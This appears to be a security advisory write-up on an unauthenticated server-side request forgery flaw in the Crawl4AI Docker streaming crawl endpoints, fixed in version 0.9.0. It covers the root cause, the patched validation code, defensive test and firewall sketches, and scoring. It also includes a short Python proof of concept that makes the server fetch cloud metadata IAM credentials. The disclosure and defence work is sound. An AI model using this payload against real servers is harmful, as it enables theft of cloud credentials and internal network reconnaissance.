The root cause of the vulnerability lies in the structural discrepancy between the streaming and non-streaming request handlers inside the deploy/docker/api.py router. While standard crawler operations route through an input normalization routine that calls validate_url_destination(), the streaming engine does not.

In the vulnerable implementation of deploy/docker/api.py, requests sent directly to /crawl/stream map to handle_stream_crawl_request(). Similarly, requests sent to /crawl with crawler_config.stream=true are diverted straight to the same streaming handler. handle_stream_crawl_request() then processed the raw seed URLs directly, without ever calling validate_url_destination().

This validation gap persisted due to regression testing shortcomings. The existing test suite verified the generic existence of SSRF filtering in some handlers but did not validate coverage across every independent path. Consequently, the streaming controller remained completely exposed to malicious user inputs.
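The coverage gap described above can be caught by a regression check that feeds the same blocked seed to every entry point, not just one. The sketch below is a self-contained illustration under stated assumptions: the handlers and the validator are simplified stand-ins written for this example (the real functions in deploy/docker/api.py take more parameters), and BlockedDestination is a hypothetical exception name.

```python
import asyncio
from typing import Awaitable, Callable, Dict, List

BLOCKED_SEED = "http://169.254.169.254/latest/meta-data/"


class BlockedDestination(ValueError):
    """Hypothetical error raised by the stand-in validator."""


def validate_url_destination(url: str) -> None:
    # Stand-in for the real validator: rejects only the metadata address.
    if "169.254.169.254" in url:
        raise BlockedDestination(url)


async def handle_crawl_request(urls: List[str]) -> str:
    # Non-streaming path: validates every seed before doing any work.
    for url in urls:
        validate_url_destination(url)
    return "crawled"


async def handle_stream_crawl_request_vulnerable(urls: List[str]) -> str:
    # Simplified pre-0.9.0 shape: seeds are used without validation.
    return "streamed"


async def handle_stream_crawl_request_patched(urls: List[str]) -> str:
    # Simplified patched shape: same validation as the non-streaming path.
    for url in urls:
        validate_url_destination(url)
    return "streamed"


Handler = Callable[[List[str]], Awaitable[str]]


def unguarded_handlers(handlers: Dict[str, Handler]) -> List[str]:
    """Return the names of handlers that accept a blocked seed URL."""
    exposed = []
    for name, handler in handlers.items():
        try:
            asyncio.run(handler([BLOCKED_SEED]))
        except BlockedDestination:
            continue  # the handler rejected the seed, as required
        exposed.append(name)
    return exposed


before = unguarded_handlers({
    "crawl": handle_crawl_request,
    "crawl_stream": handle_stream_crawl_request_vulnerable,
})
after = unguarded_handlers({
    "crawl": handle_crawl_request,
    "crawl_stream": handle_stream_crawl_request_patched,
})
print(before)  # ['crawl_stream']
print(after)   # []
```

Iterating over a registry of handlers means a newly added entry point fails the check until it is wired to the validator, which is the property the original suite lacked.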




GHSA-wm69-2pc3-rmmf: Unauthenticated Server-Side Request Forgery in Crawl4AI Docker Streaming Crawl Path

Amit Schendel

Senior Security Researcher

Jun 18, 2026

Executive Summary (TL;DR)

A bypass of SSRF validation on the streaming crawl endpoints in Crawl4AI Docker deployments allows unauthenticated remote attackers to query internal network services and cloud metadata endpoints.

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability was identified in the Crawl4AI Docker API server before version 0.9.0. The vulnerability exists because the streaming crawl endpoint (/crawl/stream) and the standard crawl endpoint with streaming enabled (/crawl with crawler_config.stream=true) bypass the validate_url_destination security filter. This allows remote, unauthenticated attackers to make the server issue arbitrary HTTP requests to internal infrastructure, loopback interfaces, or cloud metadata endpoints such as those of AWS and GCP.

Attack Flow Diagram

Vulnerability Overview

Crawl4AI is an open-source, LLM-friendly web crawler and scraper designed to convert web pages into structured text formats. To facilitate multi-user deployments, the project provides a containerized FastAPI application. The Docker server exposes endpoints that accept scraping requests, allowing remote consumers to execute crawl tasks on target URLs.

The attack surface of the Crawl4AI Docker container is unauthenticated by default. This public exposure necessitates strict validation controls to prevent attackers from using the crawler as a proxy. If a user-supplied target URL is not constrained, the backend crawler can be abused to perform network queries targeting unauthorized locations.

This security posture is compromised when handling streaming crawl operations. Specifically, the POST /crawl/stream endpoint and streaming-configured calls to POST /crawl bypass the internal validation engine. This bypass results in an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. The flaw allows remote attackers to probe internal networks and cloud infrastructure.

Root Cause Analysis

Code Analysis

To illustrate the structural omission, we examine the patch implemented in version 0.9.0. In the patched state, the development team introduced _normalize_and_validate_seeds() to centralize input filtering and to keep validation logic from drifting apart across multiple API handlers.

Below is the unified validation wrapper introduced in the patched code. This function ensures that every URL is normalized and subjected to validate_url_destination() before any networking context is initialized:

# Introduced in v0.9.0 inside deploy/docker/api.py
def _normalize_and_validate_seeds(urls: List[str]) -> List[str]:
    """Prefix bare hosts with https:// and SSRF-validate every seed URL's
    destination. Shared by the streaming and non-streaming crawl handlers."""
    urls = [('https://' + url) if not url.startswith(('http://', 'https://')) and not url.startswith(('raw:', 'raw://')) else url for url in urls]
    for url in urls:
        validate_url_destination(url)
    return urls
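To make the prefixing rule easier to follow, the sketch below restates the list comprehension as an explicit loop and runs it on a few sample seeds. It is an illustration only: normalize_seeds is a hypothetical name, the sample inputs are invented, and the validation call is left out so the block runs on its own.

```python
from typing import List


def normalize_seeds(urls: List[str]) -> List[str]:
    """Apply the same prefixing rule as the patched helper, without validation."""
    normalized = []
    for url in urls:
        has_scheme = url.startswith(("http://", "https://"))
        is_raw = url.startswith(("raw:", "raw://"))
        # Bare hosts get https://; http(s) and raw: inputs pass through unchanged.
        normalized.append(url if has_scheme or is_raw else "https://" + url)
    return normalized


seeds = [
    "example.com",
    "169.254.169.254",
    "http://10.0.0.5:8080/admin",
    "raw:<html></html>",
]
result = normalize_seeds(seeds)
for before, after in zip(seeds, result):
    print(f"{before!r} -> {after!r}")
```

Because normalization runs first, a bare host such as 169.254.169.254 is checked in the same https:// form that the crawler would later fetch.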

In the patched version of handle_stream_crawl_request(), the validation is called immediately upon receiving the parameter inputs. This enforces the exact security boundary already established in the standard crawl endpoint:

async def handle_stream_crawl_request(
    urls: List[str],
    browser_config: dict,
    crawler_config: dict,
    config: dict,
    hooks_config: Optional[dict] = None
) -> Tuple[AsyncWebCrawler, AsyncGenerator, Optional[Dict]]:
    """Handle streaming crawl requests with optional hooks."""
    hooks_info = None
    crawler = None
    try:
        # Enforce SSRF validation for streaming sessions
        urls = _normalize_and_validate_seeds(urls)
        # Remaining streaming process continues safely...

Crucially, the SSRF engine (deploy/docker/utils.py) defines blocklists for common internal network ranges. These include the IPv4 private blocks (RFC 1918), the link-local range (169.254.0.0/16), and standard internal hostnames such as metadata.google.internal and kubernetes.default. Applying _normalize_and_validate_seeds stops the attack because the egress broker resolves DNS queries and rejects destinations that fall within a blocked range.
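The kind of check described above can be sketched with the Python standard library. This is not the code in deploy/docker/utils.py: check_destination, is_blocked_address, and the injectable resolver parameter are assumptions made for illustration, and only the two hostnames named in the text are listed.

```python
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

# Hostnames named in the text; the real blocklist may contain more entries.
BLOCKED_HOSTNAMES = {"metadata.google.internal", "kubernetes.default"}


def resolve_host(host: str) -> List[str]:
    """Resolve a hostname to all of its addresses (performs a DNS lookup)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_blocked_address(address: str) -> bool:
    """True for private (incl. RFC 1918), loopback, and link-local addresses."""
    ip = ipaddress.ip_address(address.split("%")[0])  # drop any IPv6 zone id
    return ip.is_private or ip.is_loopback or ip.is_link_local


def check_destination(
    url: str, resolver: Callable[[str], List[str]] = resolve_host
) -> None:
    """Raise ValueError if the URL points at a blocked host or address."""
    host = urlsplit(url).hostname
    if not host:
        raise ValueError(f"no host in URL: {url!r}")
    if host in BLOCKED_HOSTNAMES:
        raise ValueError(f"blocked hostname: {host}")
    try:
        addresses = [str(ipaddress.ip_address(host))]  # host is an IP literal
    except ValueError:
        addresses = resolver(host)  # host is a name: check what it resolves to
    for address in addresses:
        if is_blocked_address(address):
            raise ValueError(f"blocked address {address} for host {host}")


def is_rejected(url: str, resolver: Callable[[str], List[str]]) -> bool:
    try:
        check_destination(url, resolver)
    except ValueError:
        return True
    return False


public = lambda host: ["93.184.216.34"]   # fake resolver: public address
internal = lambda host: ["10.1.2.3"]      # fake resolver: RFC 1918 address
print(is_rejected("http://169.254.169.254/latest/meta-data/", public))
print(is_rejected("https://intranet.example/", internal))
print(is_rejected("https://example.com/", public))
```

Checking the resolved addresses, and not only the literal host string, is what catches a public-looking name that points at an internal address. A production validator also has to make sure the address it checked is the one the fetch actually connects to, which this sketch does not attempt.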

Exploitation & Attack Flow

Exploitation requires no authentication or special application states. An attacker can execute the attack by sending a JSON payload directly to the /crawl/stream endpoint on an exposed server. This makes the target host fetch and return restricted local resources.

The attack flow is illustrated in the diagram below, showing how the bypass circumvents validation to access internal assets:

Below is a practical Python proof-of-concept script illustrating the exploitation technique against an unprotected target. The script triggers the streaming endpoint to crawl the cloud instance metadata service:

import requests
 
target_url = 'http://target-crawl4ai-server:11235/crawl/stream'
payload = {
    'urls': ['http://169.254.169.254/latest/meta-data/iam/security-credentials/'],
    'browser_config': {},
    'crawler_config': {}
}
 
response = requests.post(target_url, json=payload, stream=True)
for line in response.iter_lines():
    if line:
        print(line.decode('utf-8'))

Impact Assessment

The security impact of this vulnerability is classified as High (CVSS 8.6). Because the server acts as an open proxy to access internal domains, the attack scope is changed (S:C). This allows the attacker to cross security boundaries and read data from isolated environments.

A successful exploit compromises confidentiality on a systemic level (C:H). In cloud environments (such as AWS, GCP, or Azure), the metadata server exposes temporary IAM credentials, service tokens, and instance metadata. Attackers can leverage these credentials to compromise broader cloud infrastructure.

Furthermore, attackers can use the unauthenticated container as an internal port scanner. By parsing the response times and HTTP responses from streaming requests, attackers can map out the internal topology. This identifies adjacent microservices, databases, and configuration consoles that are not exposed to the public internet.

Remediation & Mitigation

Remediation requires upgrading the crawl4ai installation to version 0.9.0 or higher. This version routes both the streaming and non-streaming crawl handlers through the shared _normalize_and_validate_seeds() wrapper, which closes the bypass path.

If upgrading is delayed, organizations should restrict container egress traffic. Implement network policies using egress firewalls to prevent the Docker container from initiating outbound connections to RFC 1918 networks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) and the link-local range (169.254.0.0/16).
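One way to express such an egress policy on a Docker host is a set of DROP rules in the DOCKER-USER iptables chain. The sketch below only generates the rule strings for review; the container subnet 172.18.0.0/16 is an assumed example value, and egress_drop_rules is a hypothetical helper, not part of Crawl4AI.

```python
import ipaddress
from typing import List

# Destination ranges listed in the mitigation text above.
BLOCKED_RANGES = [
    "10.0.0.0/8",
    "172.16.0.0/12",
    "192.168.0.0/16",
    "169.254.0.0/16",
]


def egress_drop_rules(container_subnet: str, chain: str = "DOCKER-USER") -> List[str]:
    """Build iptables commands that drop container traffic to internal ranges."""
    source = ipaddress.ip_network(container_subnet)  # raises on a malformed subnet
    rules = []
    for blocked in BLOCKED_RANGES:
        destination = ipaddress.ip_network(blocked)
        rules.append(f"iptables -I {chain} -s {source} -d {destination} -j DROP")
    return rules


rules = egress_drop_rules("172.18.0.0/16")  # assumed subnet of the crawler network
for rule in rules:
    print(rule)
```

Rules like these may also cut traffic to sibling containers whose addresses fall inside the blocked ranges, so any dependency the crawler legitimately needs would have to be allowed explicitly before they are applied.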

Additionally, avoid exposing the Crawl4AI Docker server directly to the public internet without an authentication layer. Placing the container behind a reverse proxy, API gateway, or VPN that enforces token-based authorization mitigates the risk of direct exposure.

Technical Appendix

CVSS Score

8.6 / 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
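The 8.6 score can be reproduced from the vector with the CVSS v3.1 base-score equations. The sketch below handles only the Scope: Changed case and only the metric values that appear in this vector; the function names are chosen for this example.

```python
import math

# Numeric weights from the CVSS v3.1 specification for the values in this vector.
WEIGHTS = {
    "AV:N": 0.85, "AC:L": 0.77, "PR:N": 0.85, "UI:N": 0.85,
    "C:H": 0.56, "I:N": 0.0, "A:N": 0.0,
}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest number with one decimal that is >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    parts = vector.split("/")[1:]  # drop the "CVSS:3.1" prefix
    if "S:C" not in parts:
        raise ValueError("this sketch only handles Scope: Changed")
    w = {part.split(":")[0]: WEIGHTS[part] for part in parts if part != "S:C"}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(1.08 * (impact + exploitability), 10))


score = base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N")
print(score)  # 8.6
```

With these weights the impact sub-score is about 3.99 and the exploitability sub-score about 3.89; multiplying their sum by the 1.08 changed-scope factor gives roughly 8.51, which rounds up to 8.6.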

Affected Systems

Crawl4AI Docker API Server

Affected Versions Detail

Product	Affected Versions	Fixed Version
crawl4ai (Unclecode)	< 0.9.0	0.9.0

Attribute	Detail
CWE ID	CWE-918
Attack Vector	Network (AV:N)
Attack Complexity	Low (AC:L)
Privileges Required	None (PR:N)
CVSS Score	8.6 (High)
Exploit Status	Proof-of-Concept (PoC)
CISA KEV Status	Not Listed

MITRE ATT&CK Mapping

T1190: Exploit Public-Facing Application (Initial Access)

T1552.005: Unsecured Credentials: Cloud Metadata Service (Credential Access)

T1046: Network Service Discovery (Discovery)

T1090: Proxy (Command and Control)

CWE-918

Server-Side Request Forgery (SSRF)

The web application's server-side engine receives an untrusted URL, resolves it, and fetches the resource without verifying whether the host is within a restricted network boundary.

Known Exploits & Detection

GitHub Advisory: Vulnerability report highlighting the SSRF validation gap in handle_stream_crawl_request.

Vulnerability Timeline

2026-06-18: Security advisory GHSA-wm69-2pc3-rmmf published.

2026-06-18: Crawl4AI version 0.9.0 published, containing the official SSRF validation fix.
